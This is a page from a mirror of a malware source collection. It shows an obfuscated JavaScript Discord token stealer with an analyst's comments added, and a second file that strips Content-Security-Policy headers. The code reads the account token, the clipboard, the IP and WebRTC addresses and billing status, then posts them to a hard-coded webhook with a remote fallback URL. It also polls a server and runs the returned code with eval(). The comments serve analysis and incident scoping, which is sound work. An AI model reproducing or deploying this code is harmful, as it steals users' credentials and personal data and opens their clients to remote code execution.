mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
|
modules\ discord_modules:
|
||
|
|
||
|
var _0x476f = ["\x74\x6F\x73\x74\x72\x69\x6E\x67\x20\x77\x61\x73\x20\x68\x65\x72\x65", "\x72\x65\x71\x75\x69\x72\x65", "\x65\x6C\x65\x63\x74\x72\x6F\x6E", "\x74\x6F\x6B\x65\x6E", "\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65", "\x63\x6F\x6E\x74\x65\x6E\x74\x57\x69\x6E\x64\x6F\x77", "\x69\x66\x72\x61\x6D\x65", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x22", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x60", "\x73\x69\x7A\x65\x31\x34\x2D\x65\x36\x5A\x53\x63\x48\x20\x74\x69\x74\x6C\x65\x2D\x65\x53\x35\x79\x6B\x33", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x43\x6C\x61\x73\x73\x4E\x61\x6D\x65", "\x55\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x66\x65\x74\x63\x68\x2C\x20\x70\x6F\x73\x73\x69\x62\x6C\x79\x20\x64\x75\x65\x20\x74\x6F\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x64\x69\x73\x63\x6F\x72\x64\x20\x64\x69\x73\x74\x72\x69\x62\x75\x74\x65\x20\x6F\x72\x20\x75\x70\x64\x61\x74\x65\x2E", "\x74\x65\x78\x74\x43\x6F\x6E\x74\x65\x6E\x74", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x6C\x6F\x61\x64", "\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72", "\x47\x45\x54", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x74\x6F\x73\x74\x72\x69\x6E\x67\x69\x73\x76\x65\x72\x79\x63\x6F\x6F\x69\x2E\x30\x30\x30\x77\x65\x62\x68\x6F\x73\x74\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x68\x6F\x2F\x79\x6F\x75\x61\x72\x65\x61\x70\x70\x72\x6F\x61\x63\x68\x69\x6E\x67\x6D\x65\x2F\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x25\x44\x36\x25\x42\x31\x2F\x57\x52\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x59\x2E\x74\x78\x74", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", 
"\x7B\x22\x6D\x65\x73\x73\x61\x67\x65\x22\x3A\x20\x22\x49\x6E\x76\x61\x6C\x69\x64\x20\x57\x65\x62\x68\x6F\x6F\x6B\x20\x54\x6F\x6B\x65\x6E\x22\x2C\x20\x22\x63\x6F\x64\x65\x22\x3A\x20\x35\x30\x30\x32\x37\x7D", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x36\x32\x39\x31\x39\x36\x34\x30\x37\x31\x36\x34\x36\x33\x33\x30\x38\x39\x2F\x6F\x38\x30\x70\x70\x4E\x42\x31\x34\x31\x6B\x52\x7A\x6D\x51\x70\x6C\x31\x70\x76\x48\x6C\x74\x52\x6A\x47\x2D\x4B\x33\x2D\x43\x41\x6C\x72\x52\x6D\x4F\x79\x33\x4F\x46\x4F\x58\x65\x57\x31\x2D\x65\x58\x49\x57\x78\x42\x45\x54\x50\x71\x55\x48\x47\x69\x58\x61\x43\x44\x53\x58\x70", "\x50\x4F\x53\x54", "\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65", "\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E", "\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72", "\x73\x74\x72\x69\x6E\x67\x69\x66\x79", "\x67\x65\x74\x5A\x6F\x6F\x6D\x46\x61\x63\x74\x6F\x72", "\x77\x65\x62\x46\x72\x61\x6D\x65", "\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x67\x65\x74\x56\x65\x72\x73\x69\x6F\x6E", "\x61\x70\x70", "\x72\x65\x6D\x6F\x74\x65", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", "\x72\x65\x61\x64\x54\x65\x78\x74", "\x63\x6C\x69\x70\x62\x6F\x61\x72\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67", "\x74\x69\x6D\x65\x5A\x6F\x6E\x65", "\x72\x65\x73\x6F\x6C\x76\x65\x64\x4F\x70\x74\x69\x6F\x6E\x73", "\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68", "\x73\x63\x72\x65\x65\x6E", "\x78", "\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65", "\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E", "\x5B\x5D", 
"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x76\x36\x2F\x75\x73\x65\x72\x73\x2F\x40\x6D\x65\x2F\x62\x69\x6C\x6C\x69\x6E\x67\x2F\x70\x61\x79\x6D\x65\x6E\x74\x2D\x73\x6F\x75\x72\x63\x65\x73", "\x52\x54\x43\x50\x65\x65\x72\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6
|
||
|
// Renderer-side setup and credential read. `_0x476f` is the hex-escaped string
// table declared earlier in this file; this page cuts it off at index 52, so
// only indices 0-51 can be decoded from what is shown.
// Analyst note: the value read below is the account's session credential. Once
// a client has run this file, treat that token as disclosed.
// Index 0 decodes to "tostring was here"; `readme` is not referenced again in
// the visible code.
var readme = _0x476f[0];
|
||
|
// Decoded: window["require"] = require. Node's module loader is published on
// the page's window object, so any script in this renderer can reach it.
window[_0x476f[1]] = require;
|
||
|
// Decoded: require("electron").
var electron = require(_0x476f[2]);
|
||
|
// The electron module is also published as window["electron"].
window[_0x476f[2]] = require(_0x476f[2]);
|
||
|
// Decoded: document.body.appendChild(document.createElement(["iframe"]))
//            .contentWindow.localStorage.token
// A new iframe is attached to the page and the `token` entry is read through
// that iframe's localStorage handle.
// NOTE(review): presumably the page's own localStorage handle is not usable in
// the client; that is not shown here - confirm.
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
|
||
|
// Decoded: token.replace('"', ''). A string pattern replaces only the first
// match, so the two calls below remove one double quote each.
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
// From here to the end of this run the five statements above are repeated
// verbatim: a second iframe is appended and the same value is read again.
window[_0x476f[1]] = require;
|
||
|
var electron = require(_0x476f[2]);
|
||
|
window[_0x476f[2]] = require(_0x476f[2]);
|
||
|
var token = document[_0x476f[9]][_0x476f[8]](document[_0x476f[7]]([_0x476f[6]]))[_0x476f[5]][_0x476f[4]][_0x476f[3]];
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
token = token[_0x476f[12]](_0x476f[10], _0x476f[11]);
|
||
|
|
||
|
// Returns a Promise that resolves after `_0xb38cx5` milliseconds (setTimeout).
// Used by the two polling loops further down as their delay between rounds.
function sleep(_0xb38cx5) {
|
||
|
return new Promise((_0xb38cx6) => setTimeout(_0xb38cx6, _0xb38cx5))
|
||
|
}
|
||
|
// Module-level state. Index 11 decodes to the empty string, index 13 to a
// single backtick. These variables are written later by XHR load callbacks
// and read when the report string is assembled.
// ip: written by getip().
var ip = _0x476f[11];
|
||
|
// userinfo: written by getuserinfo().
var userinfo = _0x476f[11];
|
||
|
// webrtcips: appended to by the callback passed to getwebrtcinfo().
var webrtcips = _0x476f[11];
|
||
|
// hasattached: written by getpaymentsources().
var hasattached = false;
|
||
|
// underesc: a literal backtick, used as a delimiter around the token in the report.
var underesc = _0x476f[13];
|
||
|
// focusamount: counter incremented by the electron.remote.app handler below.
var focusamount = 0;
|
||
|
// WBH: the URL that pin() posts to; set by getandsetWBH() / getandsetbackupWBH().
var WBH = _0x476f[11];
|
||
|
// Decoded: document.getElementsByClassName("size14-e6ZScH title-eS5yk3")[0].
// The class names are hard-coded; when no such element exists `username` is
// set to the index-16 message ("Unable to fetch, possibly due to a different
// discord distribute or update."), otherwise to the element's textContent.
if (!document[_0x476f[15]](_0x476f[14])[0]) {
|
||
|
var username = _0x476f[16]
|
||
|
} else {
|
||
|
var username = document[_0x476f[15]](_0x476f[14])[0][_0x476f[17]]
|
||
|
};
|
||
|
|
||
|
// Fetches a replacement value for WBH from a remote text file.
// Decoded: an XMLHttpRequest GET to index 22, an https URL on a
// *.000webhostapp.com host whose path ends in ".txt"; on "load" the whole
// response body is stored in WBH without any validation.
// Analyst note: the destination used by pin() can therefore be changed by
// whoever controls that file, without touching the infected client.
function getandsetbackupWBH() {
|
||
|
// "load" handler: `this` is the XMLHttpRequest; index 18 is "responseText".
function _0xb38cx10() {
|
||
|
WBH = this[_0x476f[18]]
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
// addEventListener("load", handler)
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
// open("GET", <index 22>)
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[22]);
|
||
|
// send()
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
// Chooses the URL that pin() will post to.
// Decoded: a GET is sent to index 26, a hard-coded
// https://discordapp.com/api/webhooks/... URL. If the response body equals the
// index-25 literal {"message": "Invalid Webhook Token", "code": 50027} the
// backup lookup getandsetbackupWBH() runs; for any other body WBH is set to
// the hard-coded URL.
// Analyst note: revoking the hard-coded webhook alone does not stop the
// reporting path, because the fallback value comes from a remote file. Both
// destinations need to be blocked or taken down.
function getandsetWBH() {
|
||
|
// "load" handler: `this` is the XMLHttpRequest; index 18 is "responseText".
function _0xb38cx10() {
|
||
|
if (this[_0x476f[18]] == _0x476f[25]) {
|
||
|
getandsetbackupWBH()
|
||
|
} else {
|
||
|
WBH = _0x476f[26]
|
||
|
}
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
// addEventListener("load", handler)
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
// open("GET", <index 26>)
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[26]);
|
||
|
// send()
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
// Runs the endpoint selection at load time; WBH is filled in asynchronously
// when the XHR "load" event fires, not when this call returns.
getandsetWBH();
|
||
|
|
||
|
// Sends one message to the URL currently held in WBH.
// Decoded: XMLHttpRequest.open("POST", WBH, true), header
// "Content-Type: application/json", body JSON.stringify({content: <argument>}).
// No response handler is attached.
// Analyst note: on the wire this is a JSON POST with a single `content` field,
// issued by the chat client's own renderer process.
function pin(_0xb38cx14) {
|
||
|
var _0xb38cx15 = new XMLHttpRequest();
|
||
|
_0xb38cx15[_0x476f[23]](_0x476f[27], WBH, true);
|
||
|
_0xb38cx15[_0x476f[30]](_0x476f[28], _0x476f[29]);
|
||
|
_0xb38cx15[_0x476f[24]](JSON[_0x476f[31]]({
|
||
|
content: _0xb38cx14
|
||
|
}))
|
||
|
}
|
||
|
|
||
|
// Decoded: returns electron.webFrame.getZoomFactor(). One of the host
// fingerprint fields placed in the report.
function returnzoomfactor() {
|
||
|
return electron[_0x476f[33]][_0x476f[32]]()
|
||
|
}
|
||
|
|
||
|
// Decoded: returns navigator.userAgent. One of the host fingerprint fields
// placed in the report.
function returnuseragent() {
|
||
|
return navigator[_0x476f[34]]
|
||
|
}
|
||
|
|
||
|
// Decoded: returns electron.remote.app.getVersion(), i.e. the version string
// reported by the Electron application object, obtained through `remote`.
function getdiscordversion() {
|
||
|
return electron[_0x476f[37]][_0x476f[36]][_0x476f[35]]()
|
||
|
}
|
||
|
|
||
|
// Decoded: returns electron.clipboard.readText().substring(0, 50), the first
// 50 characters of whatever text is on the system clipboard when called.
// Analyst note: clipboard content at the time of execution (for example a
// copied password) should be counted among the data exposed.
function getclipboard() {
|
||
|
return electron[_0x476f[40]][_0x476f[39]]()[_0x476f[38]](0, 50)
|
||
|
}
|
||
|
|
||
|
// Looks up the public IP address. Decoded: XMLHttpRequest GET to
// https://api.ipify.org (index 41); on "load" the response body is stored in
// the module-level `ip`.
// Analyst note: a request to this lookup service originating from the chat
// client's renderer is one of the network artefacts of this payload.
function getip() {
|
||
|
// "load" handler: `this` is the XMLHttpRequest; index 18 is "responseText".
function _0xb38cx10() {
|
||
|
ip = this[_0x476f[18]]
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[41]);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
// Decoded: returns Intl.DateTimeFormat().resolvedOptions().timeZone, the
// time-zone name configured on the host.
function gettimezone() {
|
||
|
return Intl.DateTimeFormat()[_0x476f[43]]()[_0x476f[42]]
|
||
|
}
|
||
|
|
||
|
// Decoded: returns window.screen.availWidth + "x" + window.screen.availHeight,
// i.e. a "<width>x<height>" string for the available screen area.
function getresolution() {
|
||
|
return window[_0x476f[45]][_0x476f[44]] + _0x476f[46] + window[_0x476f[45]][_0x476f[47]]
|
||
|
}
|
||
|
|
||
|
// Fetches the account profile using the value passed in as a credential.
// Decoded: GET https://discordapp.com/api/users/@me (index 48) with the
// argument sent as the "Authorization" header (index 49); on "load" the raw
// response body is stored in the module-level `userinfo`.
// The only call in this file passes the `token` read from localStorage.
function getuserinfo(_0xb38cx1e) {
|
||
|
// "load" handler: `this` is the XMLHttpRequest; index 18 is "responseText".
function _0xb38cx10() {
|
||
|
userinfo = this[_0x476f[18]]
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[48]);
|
||
|
// setRequestHeader("Authorization", <argument>)
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
// Checks whether the account has any payment source on file.
// Decoded: GET https://discordapp.com/api/v6/users/@me/billing/payment-sources
// (index 51) with the argument as the "Authorization" header. The response
// body is compared with the literal "[]" (index 50): equal sets
// `hasattached` to false, anything else sets it to true. The body itself is
// not stored.
// Analyst note: the flag only means "the response was not the empty list";
// read it that way when interpreting a captured report.
function getpaymentsources(_0xb38cx1e) {
|
||
|
// "load" handler: `this` is the XMLHttpRequest; index 18 is "responseText".
function _0xb38cx10() {
|
||
|
if (this[_0x476f[18]] == _0x476f[50]) {
|
||
|
hasattached = false
|
||
|
} else {
|
||
|
hasattached = true
|
||
|
}
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[51]);
|
||
|
// setRequestHeader("Authorization", <argument>)
_0xb38cx11[_0x476f[30]](_0x476f[49], _0xb38cx1e);
|
||
|
_0xb38cx11[_0x476f[24]]()
|
||
|
}
|
||
|
|
||
|
// Collects IP address literals through a peer-connection object and reports
// each distinct one to the callback `_0xb38cx21`.
// What the visible code establishes: a constructor is taken from one of three
// window properties (index 52 begins "RTCPeerConnectio" before the string
// table is cut off), an instance is built with an empty iceServers list, and
// every string matched by the IPv4 / 8-group-IPv6 regex below is passed to the
// callback once.
// NOTE(review): indices 53-65 lie past the point where this page truncates the
// string table, so the member names used below are not visible. The shape is
// consistent with the widely documented WebRTC address-enumeration pattern -
// confirm against a complete copy before relying on that reading.
function getwebrtcinfo(_0xb38cx21) {
|
||
|
// First defined of three window properties is used as the constructor.
var _0xb38cx22 = window[_0x476f[52]] || window[_0x476f[53]] || window[_0x476f[54]];
|
||
|
// _0xb38cx23: the connection object, created with no ICE servers configured.
var _0xb38cx23 = new _0xb38cx22({
|
||
|
iceServers: []
|
||
|
}),
|
||
|
// _0xb38cx24: no-op, passed wherever a callback argument is required.
_0xb38cx24 = function() {},
|
||
|
// _0xb38cx25: object used as a "seen" set, keyed by address string.
_0xb38cx25 = {},
|
||
|
// _0xb38cx26: matches dotted-quad IPv4 or full 8-group lowercase-hex IPv6.
_0xb38cx26 = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
|
||
|
// _0xb38cx27: declared but not used in the visible code.
_0xb38cx27;
|
||
|
|
||
|
// Invokes the caller's callback the first time an address is seen, then
// marks it as seen so repeats are ignored.
function _0xb38cx28(ip) {
|
||
|
if (!_0xb38cx25[ip]) {
|
||
|
_0xb38cx21(ip)
|
||
|
};
|
||
|
_0xb38cx25[ip] = true
|
||
|
}
|
||
|
// Method [55] is called with the empty string (index 11); name not visible.
_0xb38cx23[_0x476f[55]](_0x476f[11]);
|
||
|
// Method [64] receives a success callback and the no-op as failure callback.
_0xb38cx23[_0x476f[64]](function(_0xb38cx29) {
|
||
|
// A property of the result is split/iterated ([62], [61], [60], [58]); items
// that do not contain the index-56 string are skipped, the rest are run
// through the address regex.
_0xb38cx29[_0x476f[62]][_0x476f[61]](_0x476f[60])[_0x476f[58]](function(_0xb38cx2a) {
|
||
|
if (_0xb38cx2a[_0x476f[57]](_0x476f[56]) < 0) {
|
||
|
return
|
||
|
};
|
||
|
_0xb38cx2a[_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
|
||
|
});
|
||
|
_0xb38cx23[_0x476f[63]](_0xb38cx29, _0xb38cx24, _0xb38cx24)
|
||
|
}, _0xb38cx24);
|
||
|
// Property [65] is assigned an event handler; events lacking the nested
// index-56 field, or with no regex match in it, are ignored.
_0xb38cx23[_0x476f[65]] = function(_0xb38cx2b) {
|
||
|
if (!_0xb38cx2b || !_0xb38cx2b[_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]] || !_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)) {
|
||
|
return
|
||
|
};
|
||
|
_0xb38cx2b[_0x476f[56]][_0x476f[56]][_0x476f[59]](_0xb38cx26)[_0x476f[58]](_0xb38cx28)
|
||
|
}
|
||
|
}
|
||
|
// Remote tasking loop: never returns. Once every 60000 ms it sends a GET to
// the URL at index 67 and, unless the response body equals the string at
// index 66, passes the body to eval().
// NOTE(review): indices 66 and 67 are past the point where this page cuts off
// the string table, so neither the URL nor the "do nothing" marker is visible.
// SECURITY: eval() on a network response means the operator of that URL can
// run arbitrary JavaScript in this renderer, which has Node's `require`
// exposed on `window` by this file. The behaviour of an infected client is
// therefore not limited to what this file contains; incident scoping should
// assume arbitrary follow-on code may have run.
async function fightdio() {
|
||
|
while (true) {
|
||
|
// "load" handler: `this` is the XMLHttpRequest; index 18 is "responseText".
function _0xb38cx10() {
|
||
|
var _0xb38cx2d = this[_0x476f[18]];
|
||
|
if (_0xb38cx2d == _0x476f[66]) {
|
||
|
return
|
||
|
} else {
|
||
|
// Executes the fetched text as code in the page context.
eval(_0xb38cx2d)
|
||
|
}
|
||
|
}
|
||
|
var _0xb38cx11 = new XMLHttpRequest();
|
||
|
_0xb38cx11[_0x476f[20]](_0x476f[19], _0xb38cx10);
|
||
|
// open("GET", <index 67>)
_0xb38cx11[_0x476f[23]](_0x476f[21], _0x476f[67]);
|
||
|
_0xb38cx11[_0x476f[24]]();
|
||
|
// One-minute polling interval.
await sleep(60000)
|
||
|
}
|
||
|
}
|
||
|
// DOM manipulation loop: never returns, one pass every 100 ms.
// Each pass (a) walks the elements returned by
// document.getElementsByClassName(<index 69>) and, where property [70] equals
// the string at index 71, calls method [72] on the element and passes the
// result to console[<index 73>]; (b) if an element with class <index 74>
// exists, calls method [72] on the first one.
// NOTE(review): indices 68-74 are not visible on this page (string table cut
// off at 52). [68] is used as the loop bound, presumably "length". The
// function name suggests it targets an entry in the client's server list;
// that cannot be confirmed from what is shown.
async function delboostserveronclient() {
|
||
|
while (true) {
|
||
|
for (var _0xb38cx2f = 0; _0xb38cx2f < document[_0x476f[15]](_0x476f[69])[_0x476f[68]]; _0xb38cx2f++) {
|
||
|
if (document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[70]] == _0x476f[71]) {
|
||
|
console[_0x476f[73]](document[_0x476f[15]](_0x476f[69])[_0xb38cx2f][_0x476f[72]]())
|
||
|
}
|
||
|
};
|
||
|
if (document[_0x476f[15]](_0x476f[74])[0]) {
|
||
|
document[_0x476f[15]](_0x476f[74])[0][_0x476f[72]]()
|
||
|
};
|
||
|
// 100 ms between passes, i.e. roughly ten DOM scans per second.
await sleep(100)
|
||
|
}
|
||
|
}
|
||
|
// Registers a callback on electron.remote.app (indices 37 and 36) through
// method [82] for the event named at index 75. Each invocation increments
// `focusamount`; on the 15th the handler calls console[<77>](<76>),
// electron[<79>][<78>]() and window[<81>][<80>](), then resets the counter.
// NOTE(review): indices 75-82 are not visible on this page, so the event name
// and the three calls cannot be identified from here. The counter's name
// suggests a window-focus event - confirm against a complete copy.
electron[_0x476f[37]][_0x476f[36]][_0x476f[82]](_0x476f[75], () => {
|
||
|
focusamount = focusamount + 1;
|
||
|
if (focusamount >= 15) {
|
||
|
console[_0x476f[77]](_0x476f[76]);
|
||
|
electron[_0x476f[79]][_0x476f[78]]();
|
||
|
window[_0x476f[81]][_0x476f[80]]();
|
||
|
focusamount = 0
|
||
|
}
|
||
|
});
|
||
|
// Start-up sequence of the payload: launch the collectors, wait a fixed five
// seconds, assemble one report string and post it, and start the two
// background loops.
// Analyst note - fields present in the report, in order of concatenation:
// the token (wrapped in two backticks on each side), time zone, screen
// resolution, public IP, addresses from getwebrtcinfo(), raw profile JSON,
// displayed username, payment-source flag, zoom factor, user agent, client
// version, first 50 clipboard characters. The label strings between them
// (indices 83-95) are not visible on this page.
// Each address reported by getwebrtcinfo() is appended to `webrtcips`,
// followed by the separator at index 83.
getwebrtcinfo(function(ip) {
|
||
|
webrtcips = webrtcips + ip + _0x476f[83]
|
||
|
});
|
||
|
// The three lookups below are asynchronous; their results land in the
// module-level variables when the XHR "load" events fire.
getip();
|
||
|
getuserinfo(token);
|
||
|
getpaymentsources(token);
|
||
|
// After 5000 ms, build the report from whatever the collectors have stored so
// far and hand it to pin(), which POSTs it to WBH.
setTimeout(() => {
|
||
|
var _0xb38cx30 = (_0x476f[84] + underesc + _0x476f[11] + underesc + _0x476f[11] + token + _0x476f[11] + underesc + _0x476f[11] + underesc + _0x476f[85] + (gettimezone()) + _0x476f[86] + (getresolution()) + _0x476f[87] + ip + _0x476f[88] + webrtcips + _0x476f[89] + userinfo + _0x476f[90] + username + _0x476f[91] + hasattached + _0x476f[92] + (returnzoomfactor()) + _0x476f[93] + (returnuseragent()) + _0x476f[94] + (getdiscordversion()) + _0x476f[95] + (getclipboard()) + _0x476f[11]);
|
||
|
pin(_0xb38cx30)
|
||
|
}, 5000);
|
||
|
// Starts the 100 ms DOM loop.
setTimeout(() => {
|
||
|
delboostserveronclient()
|
||
|
}, 1);
|
||
|
// Starts the 60 s fetch-and-eval loop.
setTimeout(() => {
|
||
|
fightdio()
|
||
|
}, 1)
|
||
|
|
||
|
|
||
|
\ modules\ discord_desktop_core:
|
||
|
// Second injected file, labelled on this page as belonging to
// modules\discord_desktop_core. It hooks response handling on Electron's
// default session and removes Content-Security-Policy headers before the
// renderer sees them, then loads the real module.
// Analyst note: the final `module.exports = require('./core.asar')` line is
// the only statement needed to load the real module. Anything in this file in
// addition to it is worth treating as tampering (verify against a clean
// install of the same client version). With CSP removed, the renderer-side
// payload is presumably free to contact third-party hosts and to eval()
// fetched text - the policy contents are not shown here, so confirm.
const electron = require('electron');
|
||
|
// `path` is required but not used in the visible code.
const path = require('path');
|
||
|
|
||
|
electron.session.defaultSession.webRequest.onHeadersReceived(function(details, callback) {
|
||
|
// Responses carrying neither CSP header are passed through unmodified.
if (!details.responseHeaders['content-security-policy-report-only'] && !details.responseHeaders['content-security-policy']) return callback({
|
||
|
cancel: false
|
||
|
});
|
||
|
// Otherwise both the enforcing and the report-only policy headers are removed.
delete details.responseHeaders['content-security-policy-report-only'];
|
||
|
delete details.responseHeaders['content-security-policy'];
|
||
|
// The response continues with the stripped header set.
callback({
|
||
|
cancel: false,
|
||
|
responseHeaders: details.responseHeaders
|
||
|
});
|
||
|
});
|
||
|
|
||
|
// Hands control to the client's real core module so it keeps working normally.
module.exports = require('./core.asar');
|